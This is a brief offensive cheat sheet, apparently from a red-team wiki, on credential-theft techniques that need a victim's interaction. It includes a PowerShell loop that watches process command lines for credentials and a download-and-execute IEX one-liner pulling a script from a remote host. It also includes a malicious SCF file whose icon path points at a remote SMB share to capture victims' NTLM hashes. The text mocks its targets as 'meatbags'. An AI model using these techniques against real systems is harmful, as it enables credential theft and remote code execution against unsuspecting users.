User-Interaction Attacks
Here we would talk about some nice-n-easy techniques which requires interaction with meatbags like million types of intercepting creds :3
Monitoring for Process Command Lines
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}PS C:\> IEX (iwr 'http://13.13.13.13/procmon.ps1') Malicious SCF file
[Shell]
Command=2
IconFile=\\13.13.13.13\share\legit.ico
[Taskbar]
Command=ToggleDesktopLast updated